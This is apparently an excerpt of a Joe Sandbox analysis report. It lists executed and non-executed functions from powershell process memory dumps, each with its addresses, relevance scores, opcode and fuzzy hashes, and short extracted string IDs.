                                        • API String ID:
                                        • Opcode ID: 5cbacac7e850bd12f77aa92805fac5aa0a9f62a30219c7e1751397acfe4cfa02
                                        • Instruction ID: ac17652667b92e4b8a818a5346d28227cff174a0c90b514008d32d69d7628dca
                                        • Opcode Fuzzy Hash: 5cbacac7e850bd12f77aa92805fac5aa0a9f62a30219c7e1751397acfe4cfa02
                                        • Instruction Fuzzy Hash: EBD09239B04218CFCB14CB98E885ADDB771FF88316F2081A6E5159B261CB32AD16CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447BD5B Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 347fc31c8b22d97a28ffa2699a9f7351c4aca13ae926ac0ead0c733c02d9d846
                                        • Instruction ID: b7551b5f9965b3158033c6e68c4ed2a3edceba76ee07e45209069e06c78af61a
                                        • Opcode Fuzzy Hash: 347fc31c8b22d97a28ffa2699a9f7351c4aca13ae926ac0ead0c733c02d9d846
                                        • Instruction Fuzzy Hash: F1B0122939130006EA040E3315462E627D59AD03D2B649072F801C4451CA3DC0062140
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04477940 Relevance: .0, Instructions: 8COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e89b79f7558e78988139c101efaa6745aa23e494a2b96965f39d5428cc2f817c
                                        • Instruction ID: 776eac19107d41846a73dafa8b0077cee8df26b8488c6862717359355690adbf
                                        • Opcode Fuzzy Hash: e89b79f7558e78988139c101efaa6745aa23e494a2b96965f39d5428cc2f817c
                                        • Instruction Fuzzy Hash: 15B0923204970A8FC2096FB5E40881473A9BE4820938108ACE50E0A2928E76E881CE45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 070E1BE0 Relevance: 10.4, Strings: 8, Instructions: 414COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1714505266.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $cuk$4'^q$4'^q$4'^q$4'^q$piJk$tP^q$tP^q
                                        • API String ID: 0-286632652
                                        • Opcode ID: fc17395bba660e7b46465215d4d1ee13a380ff148ee4663e854f60194b389a61
                                        • Instruction ID: f80e1c6a15459c0d069160ee3af6000e2522870111a2e58a33b9c10c46e46a67
                                        • Opcode Fuzzy Hash: fc17395bba660e7b46465215d4d1ee13a380ff148ee4663e854f60194b389a61
                                        • Instruction Fuzzy Hash: 16D139B1B0430A8FC7259B68940466BBBFEAFC5310F1886ABD555CF256DB32C885C7E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447ED30 Relevance: 10.1, Strings: 8, Instructions: 149COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,bq$0oAp$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-4154621813
                                        • Opcode ID: eb638aae0890d9906f33da610b657debfeb3d19561b598e9fb6c22d44fcbdaa4
                                        • Instruction ID: dd5f3d2d05e2e2635c6e284d476246c864c274fb6b0ed256368a99fd8bfc441b
                                        • Opcode Fuzzy Hash: eb638aae0890d9906f33da610b657debfeb3d19561b598e9fb6c22d44fcbdaa4
                                        • Instruction Fuzzy Hash: 904131303840598FEF799B7D85549BD2A92AB896403205DEBD012CF7B5EE19EC838793
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0447EF98 Relevance: 9.2, Strings: 7, Instructions: 453COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0oAp$0oAp$0oAp$`Q^q$$^q$$^q$$^q
                                        • API String ID: 0-1375766648
                                        • Opcode ID: 25a2eeefd5fa4bdf840350c071fcb65e89da1a7537888437fc1977261ab15b92
                                        • Instruction ID: 77eeef2586e81e3ed2a144368b8754a0afcfbbd999703fabc57b34932126e953
                                        • Opcode Fuzzy Hash: 25a2eeefd5fa4bdf840350c071fcb65e89da1a7537888437fc1977261ab15b92
                                        • Instruction Fuzzy Hash: FBE1E1307501108FDF289B79891466E76D7AFC8B10B2448ABD902DF3A5EE75EC4B8792
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04474D62 Relevance: 6.4, Strings: 5, Instructions: 120COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: dn^$dn^$dn^$dn^$dn^
                                        • API String ID: 0-1021356010
                                        • Opcode ID: 6cbc13651e4dd8cf1452be5c746dda4ed506c54f4c837fe61703d4753c3a3c91
                                        • Instruction ID: c819b9c860a6f5527bb559c3556262d5cca5a47d90e1848d0565c5b6bdadc129
                                        • Opcode Fuzzy Hash: 6cbc13651e4dd8cf1452be5c746dda4ed506c54f4c837fe61703d4753c3a3c91
                                        • Instruction Fuzzy Hash: 8D413A2560E3C18FC7079B3C99A44957FB5AF572A471A41DBD1C4CF2B7D9289C0AC3A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04474C62 Relevance: 6.3, Strings: 5, Instructions: 84COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: dn^$dn^$dn^$dn^$dn^
                                        • API String ID: 0-1021356010
                                        • Opcode ID: 4f2a4b4731d30df94406e33b8007cff0a75180096e4fa33ceb30ff461627cd26
                                        • Instruction ID: 6171ab6592dff42f85717e252c0bfe147ad44cc65990b2ac4996c113beb4b58d
                                        • Opcode Fuzzy Hash: 4f2a4b4731d30df94406e33b8007cff0a75180096e4fa33ceb30ff461627cd26
                                        • Instruction Fuzzy Hash: F631B22650E3C18FC30B9B7998A80C97F75AE631A470E81EBC1C4CF0A3D8591C4AC3A6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 070E37F0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1714505266.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$xl$xl
                                        • API String ID: 0-2883722390
                                        • Opcode ID: 00bfb5002f6e12f283613debae1e859f9ce862812e3dcdc15ce05b79a0ced05e
                                        • Instruction ID: 36dff2d7ad3618c223c9dcfebf80a221e6af84c77c744c327d27aedd38e8b55c
                                        • Opcode Fuzzy Hash: 00bfb5002f6e12f283613debae1e859f9ce862812e3dcdc15ce05b79a0ced05e
                                        • Instruction Fuzzy Hash: F611E97570430A9FEB68591A9A04B3BFFEEAFC1B20F24C62BE4558B354CA32C445C751
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04477A21 Relevance: 5.2, Strings: 4, Instructions: 242COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `_q$`_q$`_q$`_q
                                        • API String ID: 0-3297199963
                                        • Opcode ID: fc1fe56dd75f1f7bbb0c4dafbef5dbdcae9077fd059b81bfc7334dc910e7d954
                                        • Instruction ID: 23cf96043bc078ea1a660dd1242adf6dfb107fb3c87ddbcc81b555d2ba11a6cd
                                        • Opcode Fuzzy Hash: fc1fe56dd75f1f7bbb0c4dafbef5dbdcae9077fd059b81bfc7334dc910e7d954
                                        • Instruction Fuzzy Hash: EFB19574E012099FDB55DFA9D580A9EFBF1FF88300F10862AE819AB355DB70A945CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04477A30 Relevance: 5.2, Strings: 4, Instructions: 234COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `_q$`_q$`_q$`_q
                                        • API String ID: 0-3297199963
                                        • Opcode ID: db746c9a85db89e746d0dd9d4cf297672d832b91e28b9bb222b30795c21a4a5c
                                        • Instruction ID: 5a215cd7d6c7c7bdba9e72276a0f1902b4efcf4fdfae25194c0f8c8259aa7262
                                        • Opcode Fuzzy Hash: db746c9a85db89e746d0dd9d4cf297672d832b91e28b9bb222b30795c21a4a5c
                                        • Instruction Fuzzy Hash: 28B19674E002099FDB55DFA9D580A9EFBF1FF88304F10862AE819AB355DB70A945CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 070E5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1714505266.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: bbf9e66800786b03aca334bdd72d36d12e3cb4de037a0a995cc79f0d7100075d
                                        • Instruction ID: fc5bdeb91bec27eda121ed6712011af4afafacbaf0e97a36583759cda5e30550
                                        • Opcode Fuzzy Hash: bbf9e66800786b03aca334bdd72d36d12e3cb4de037a0a995cc79f0d7100075d
                                        • Instruction Fuzzy Hash: 592199B230030A9FDBB4592A9D00B2BB7DE6BC1718F248D3AE445DF390DD75C8518361
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 070E0329 Relevance: 5.0, Strings: 4, Instructions: 33COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1714505266.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$$^q$$^q
                                        • API String ID: 0-2049395529
                                        • Opcode ID: f05770754b1167350723718ec2533e5407fe4284b42d13556eda8983ce0275fc
                                        • Instruction ID: ca89a9a00fd5b9f002bb2d060aff87060af470f03c9fb9cf8d59437dcdddf555
                                        • Opcode Fuzzy Hash: f05770754b1167350723718ec2533e5407fe4284b42d13556eda8983ce0275fc
                                        • Instruction Fuzzy Hash: 39F0EC71B4121A4FC77D157C251413E91DF5BC0A517388A2ED0129F348CEB2CD8A43D7
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Function 07601F7C Relevance: 14.0, Strings: 10, Instructions: 1516COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1770971047.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7600000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$xl$xl
                                        • API String ID: 0-1406044387
                                        • Opcode ID: c6235d2dc94289d6c861fd3fbc53b56f31562ad9194d112218550575e40fd19b
                                        • Instruction ID: 4f370f2e11789f53a5a23efbbf048ea6e0000a9dfd864f0434abf7752cdc4acd
                                        • Opcode Fuzzy Hash: c6235d2dc94289d6c861fd3fbc53b56f31562ad9194d112218550575e40fd19b
                                        • Instruction Fuzzy Hash: 53821AB17042059FCB298F78C96866BBBA2BF85310F1484AAD546CF3D1DB35D885C7E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3B0D7 Relevance: .3, Instructions: 329COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7258b314104a688ef979aef143d1939b643ee9e5aa5dfdbf7790846aac9b9da
                                        • Instruction ID: 1d707e7fcb143118ad0c8a52a0f9ca5b20e76811435503e360ba6ecdf221ff4c
                                        • Opcode Fuzzy Hash: b7258b314104a688ef979aef143d1939b643ee9e5aa5dfdbf7790846aac9b9da
                                        • Instruction Fuzzy Hash: 95C1C172A043544FDB1AEFB489215AEBBF2EF81310B04856ED049AF352DF345D0ACB96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3B1B8 Relevance: .3, Instructions: 252COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3743502a38260e8bf40c309cd930392936513103ad24001af30fb5dd4ecc6d39
                                        • Instruction ID: 75782c91f20c50149e07f074496c3cc0a414699c4df781036bc142eb21f42d72
                                        • Opcode Fuzzy Hash: 3743502a38260e8bf40c309cd930392936513103ad24001af30fb5dd4ecc6d39
                                        • Instruction Fuzzy Hash: BE919172B006145BCB19EFB5C9156AFB7E2EFC4704B10892DD14AAB340DF746E0A8BD6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3BD30 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (bq
                                        • API String ID: 0-149360118
                                        • Opcode ID: 5a361bcba8de016df45caffda4bac2006aa4a6c32ffcfae8cb77eff6f8c9e21e
                                        • Instruction ID: e8a57e0576f77332b92b3dbfe5c3b6aec9531127a07751f06c58c85fc2565d50
                                        • Opcode Fuzzy Hash: 5a361bcba8de016df45caffda4bac2006aa4a6c32ffcfae8cb77eff6f8c9e21e
                                        • Instruction Fuzzy Hash: 0F31E0323042004FC715AB79E86196EBBEAEBC1321714853ED10A8B355DF329C0687A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3BC38 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: </wl
                                        • API String ID: 0-2362596250
                                        • Opcode ID: ce83a3c0a11c4158f5b9c1b04fb984482831a038fcbaf0a59535205b2d571b7f
                                        • Instruction ID: 6536ecc2286850a7f9083bcc8bd240ad83b5534ed8516b940cd00dbaff8f1332
                                        • Opcode Fuzzy Hash: ce83a3c0a11c4158f5b9c1b04fb984482831a038fcbaf0a59535205b2d571b7f
                                        • Instruction Fuzzy Hash: B83106317002059FCB21CF69D950AAABFF5EF89320F04846EE195CB362D771D905DB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3ACC0 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (&^q
                                        • API String ID: 0-2067289071
                                        • Opcode ID: a61be03dd1ea48f55d784fdb5012f7260e7aece49a0ce2dff1d748f13fa28f61
                                        • Instruction ID: 4200bd8e5f6e49ec122c187bf4bf59f3e4d93d937b250650da93c64ae1356ff7
                                        • Opcode Fuzzy Hash: a61be03dd1ea48f55d784fdb5012f7260e7aece49a0ce2dff1d748f13fa28f61
                                        • Instruction Fuzzy Hash: 3F21E071E002588FCB14DFAED404B9EBFF5EB89320F24846AD448E7350CB399801CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3BC48 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: </wl
                                        • API String ID: 0-2362596250
                                        • Opcode ID: 99a024b99bdd1851b573ed51cbec866eb3e18121443f3e84bc3ccacbb2e94b5a
                                        • Instruction ID: 4b3b9bbc5b67a198b3a95d13b9f1146e98129b988e7e034abcf873684ff99c5f
                                        • Opcode Fuzzy Hash: 99a024b99bdd1851b573ed51cbec866eb3e18121443f3e84bc3ccacbb2e94b5a
                                        • Instruction Fuzzy Hash: 5821A131B002059FCB20CF6AD945BAABBE6EF88320F14C429E559CB365DB71E945DB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3B7E8 Relevance: .2, Instructions: 155COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: abbcb92acd277a96696a90da171431542a2cbfa2cf4e0d2cfd56c510305fae9e
                                        • Instruction ID: fe61f163dceffbaeb90fc18c7eebc0606a16df9c68ea00131a4f1864fcc4060d
                                        • Opcode Fuzzy Hash: abbcb92acd277a96696a90da171431542a2cbfa2cf4e0d2cfd56c510305fae9e
                                        • Instruction Fuzzy Hash: 5661F371E012088FCB14DFA9D594B9DBBF5EF88320F24812AE909AB265DB349D45CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3B7D9 Relevance: .2, Instructions: 155COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 827080a75f38466940fc81849750311353d5827519e8de36c0351114a7a01b0d
                                        • Instruction ID: 49f015616baf3ae58e02ab74507c32785844f1b922a6188d126abbed8c18ddf6
                                        • Opcode Fuzzy Hash: 827080a75f38466940fc81849750311353d5827519e8de36c0351114a7a01b0d
                                        • Instruction Fuzzy Hash: 4A511471E01248DFCB04DFA9D594B9DBBF5EF88320F24806AE909AB365DB349C45CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F37428 Relevance: .2, Instructions: 152COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6c56b85f0d84e134d6c180717929bc0792881c5ff29a3efb504b58da4c7767c5
                                        • Instruction ID: 83097bbc5e79da5c201da0465e5f8c1d3634c54714e4a28c0b62f2bff5f56c0e
                                        • Opcode Fuzzy Hash: 6c56b85f0d84e134d6c180717929bc0792881c5ff29a3efb504b58da4c7767c5
                                        • Instruction Fuzzy Hash: 3C51D371304315DFD718EB68D844B2A7BE6FF88325F158469E509CB356EB31EC018B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F37121 Relevance: .1, Instructions: 107COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1d2f475b23b35ecff5eed8776ff94a3ebe2b1831482f812fd8aaca033ed389f0
                                        • Instruction ID: c934ff755f72ef92ef81b62254d1207e5ce16ec556096e38744e155c51ee4e34
                                        • Opcode Fuzzy Hash: 1d2f475b23b35ecff5eed8776ff94a3ebe2b1831482f812fd8aaca033ed389f0
                                        • Instruction Fuzzy Hash: 91418074A043448FCB15DF65C898AAABBF1AF8D324F154099E441EB3A2CB31DC01DF61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F37148 Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9747ee5155d734395e7f7d73e3fe97f6ec9dbb039c57da2e9b74e860e5f7c6a3
                                        • Instruction ID: 921294bb5ea5b210bf4495fa775e3312c61aeadd15992e5dd650460a6a705d4c
                                        • Opcode Fuzzy Hash: 9747ee5155d734395e7f7d73e3fe97f6ec9dbb039c57da2e9b74e860e5f7c6a3
                                        • Instruction Fuzzy Hash: C2310B75A042048FDB14DF65C598AAABBF2EF8D325F155098E406AB391DB31DC41DF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F372B3 Relevance: .1, Instructions: 97COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 17c841177dc333fcd45152d7c61bebc0f0806e8daca4017352a99ed56458d92b
                                        • Instruction ID: e3c05f018cafa143ef111a3a4b66d2c78074da60ba744b0e5a054ff047474dac
                                        • Opcode Fuzzy Hash: 17c841177dc333fcd45152d7c61bebc0f0806e8daca4017352a99ed56458d92b
                                        • Instruction Fuzzy Hash: 6F219F753002018FC714EB7DE990A2E77D7EBC8335B198069E909CB359DE36CC069B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3AB89 Relevance: .1, Instructions: 94COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c61d9506399a3752bb2f02936969206ca247df80ceda79505204712c6413e17c
                                        • Instruction ID: 48c4694b4c16ad46b847a09daaf6361a600bc8af78f989a178bcf86d5644c837
                                        • Opcode Fuzzy Hash: c61d9506399a3752bb2f02936969206ca247df80ceda79505204712c6413e17c
                                        • Instruction Fuzzy Hash: 92318C30E002098FDB05DF7AD4947AEBBF6EF89360F249069E445EB351EB348C419B62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3AA51 Relevance: .1, Instructions: 85COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3b0353782285d7d90778a6e357e90f449f56baac77de53ea88092e3d3da01c2
                                        • Instruction ID: 4709e3b1594279d47c73bb793ca261645c1fe75f9ca0b709db93d0af98591d4d
                                        • Opcode Fuzzy Hash: b3b0353782285d7d90778a6e357e90f449f56baac77de53ea88092e3d3da01c2
                                        • Instruction Fuzzy Hash: 3131A174A002059FDB04EFB4D855ABF7BF2EF84300F1194B8E504AB396DA399D428BA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3AB98 Relevance: .1, Instructions: 84COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bc7a141a55472f3f1bb15b72bdd824dfed6d60c4e0f424a0c4ee96fff09a9e9d
                                        • Instruction ID: f497cff48cc9fa607a5207bd9f7edaab925e13a521e030144e2ec0fad4d4e365
                                        • Opcode Fuzzy Hash: bc7a141a55472f3f1bb15b72bdd824dfed6d60c4e0f424a0c4ee96fff09a9e9d
                                        • Instruction Fuzzy Hash: 0E314C70E002099FCB04DFAAD5947AEBBF6EF99360F249029E405EB350EF748C419B65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3AA60 Relevance: .1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42431d8f4b0016ed1e0a2a58c80531c94611e9f33da6ace40a4e91b7eea104d5
                                        • Instruction ID: 18e634dacaf1ef28d8f56429d6d636b71028c2609922a2053fe9f3c8630be420
                                        • Opcode Fuzzy Hash: 42431d8f4b0016ed1e0a2a58c80531c94611e9f33da6ace40a4e91b7eea104d5
                                        • Instruction Fuzzy Hash: A3317C74A002099FDB04EFB4D955ABFB7F3EF84300F119478E514AB396DA3A9D428B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00ECF370 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754097625.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_ecd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe68f67f06321ccdd0704b6d201deae8d49046920c72aa8fcc55da27376ddcf7
